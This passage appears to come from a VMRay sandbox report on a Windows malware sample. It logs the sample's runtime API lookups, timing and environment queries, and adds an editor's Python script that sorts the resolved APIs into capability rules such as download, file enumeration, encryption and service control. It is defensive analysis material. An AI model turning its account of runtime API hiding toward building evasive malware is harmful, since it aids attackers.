Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x75224642 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 9, address_out = 0x75223eae True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 8, address_out = 0x75223ed5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 200, address_out = 0x75223f21 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 12, address_out = 0x75225dee True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = 201, address_out = 0x75224af8 True 1
Fn
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x74b59263 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x75bc311b True 1
Fn
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x74a9572c True 1
Fn
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x74a8436b True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x759e5d77 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
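The sample resolves almost its whole working API set at runtime through GetProcAddress, which is why the static import table says little about it and why this table is the place to read its capabilities from. The script below is an added example, not part of the VMRay report or of any VMRay tooling: it parses a subset of the "Get Address" rows copied from the table above (addresses are the report's own), groups the successfully resolved names under capability rules that are the editor's own and not a published rule set, and reports ordinal-only resolutions (ws2_32.dll, oleaut32.dll) separately instead of guessing names for them, since name-based rules cannot see them.

```python
import re
from collections import defaultdict

# Constructed input: a subset of rows copied from the report's "Get Address"
# table (the resolved addresses are the report's own). A real run would be
# fed the whole table.
GET_ADDRESS_ROWS = r"""
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x753f9197 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x7544be5c True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x76c35371 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x76c49af0 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextW, address_out = 0x74d4df14 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x74d4c532 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x74d6779b True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenSCManagerW, address_out = 0x74d4ca64 True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenServiceW, address_out = 0x74d4ca4c True 1
Get Address c:\windows\syswow64\advapi32.dll function = ControlService, address_out = 0x74d67144 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x75bcb131 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75bd7673 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
"""

GET_ADDRESS_RE = re.compile(
    r"^Get Address (\S+) function = ([^,]+), address_out = (0x[0-9a-fA-F]+) (True|False)"
)

# Editor's own capability rules (hypothetical, not VMRay's). Each tuple is an
# "any of" group; a rule matches only when every group is satisfied by a name
# the sample resolved successfully.
CAPABILITY_RULES = {
    "process enumeration (Toolhelp)": [
        ("CreateToolhelp32Snapshot",),
        ("Process32FirstW", "Process32First"),
        ("Process32NextW", "Process32Next"),
    ],
    "HTTP download (WinINet)": [
        ("InternetOpenW", "InternetOpenA"),
        ("InternetOpenUrlW", "InternetOpenUrlA"),
        ("InternetReadFile",),
    ],
    "drive and file enumeration": [("GetLogicalDrives",), ("FindFirstFileW",), ("FindNextFileW",)],
    "CryptoAPI key import and encryption": [("CryptAcquireContextW",), ("CryptImportKey",), ("CryptEncrypt",)],
    "service control": [("OpenSCManagerW",), ("OpenServiceW",), ("ControlService",)],
    "registry value write": [("RegOpenKeyExW",), ("RegSetValueExW",)],
    # Deliberately name-based: Winsock is resolved by ordinal in this report,
    # so this rule cannot fire even though the sample does resolve Winsock.
    "Winsock by name": [("WSAStartup",), ("socket",), ("connect",)],
}


def triage_dynamic_imports(text):
    """Parse 'Get Address' rows and evaluate the capability rules against the
    names that resolved. Ordinal lookups and failed lookups are reported
    separately so that a name-based miss is visible rather than silent."""
    resolved = {}                   # api name -> dll basename
    ordinals = defaultdict(list)    # dll basename -> [ordinal, ...]
    unresolved = []
    for line in text.splitlines():
        m = GET_ADDRESS_RE.match(line)
        if not m:
            continue
        path, func, addr, ok = m.groups()
        dll = path.rsplit("\\", 1)[-1].lower()
        if ok != "True" or int(addr, 16) == 0:
            unresolved.append(func)
            continue
        if func.isdigit():
            ordinals[dll].append(int(func))
        else:
            resolved[func] = dll
    capabilities = {}
    for name, groups in CAPABILITY_RULES.items():
        hits = []
        for group in groups:
            hit = next((api for api in group if api in resolved), None)
            if hit is None:
                break
            hits.append(hit)
        else:
            capabilities[name] = hits
    return {
        "capabilities": capabilities,
        "ordinal_imports": dict(ordinals),
        "unresolved": unresolved,
        "resolved_count": len(resolved),
    }


if __name__ == "__main__":
    report = triage_dynamic_imports(GET_ADDRESS_ROWS)
    for name, hits in report["capabilities"].items():
        print(f"[+] {name}: {', '.join(hits)}")
    for dll, ords in report["ordinal_imports"].items():
        print(f"[?] {dll}: resolved by ordinal only {ords} (map against the export table before triage)")
    print(f"[-] failed lookups: {report['unresolved']}")
```

On the subset above six rules fire and the name-based Winsock rule does not, because ws2_32.dll is only ever reached by ordinal. Failed lookups such as SetDefaultDllDirectories (address_out = 0x0) are version probes rather than capabilities, so they are listed but never feed a rule.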
System (5)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:23:06 (UTC) True 1
Fn
Get Time type = Ticks, time = 166609 True 1
Fn
Get Time type = Performance Ctr, time = 23390825524 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:23:12 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 24120356258 True 1
Fn
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data (Function Logfile, Before, After, Screenshot): these views require an online connection to the VMRay backend. An offline version with limited functionality is also provided; it is supported only in Mozilla Firefox with the setting "security.fileuri.strict_origin_policy" deactivated.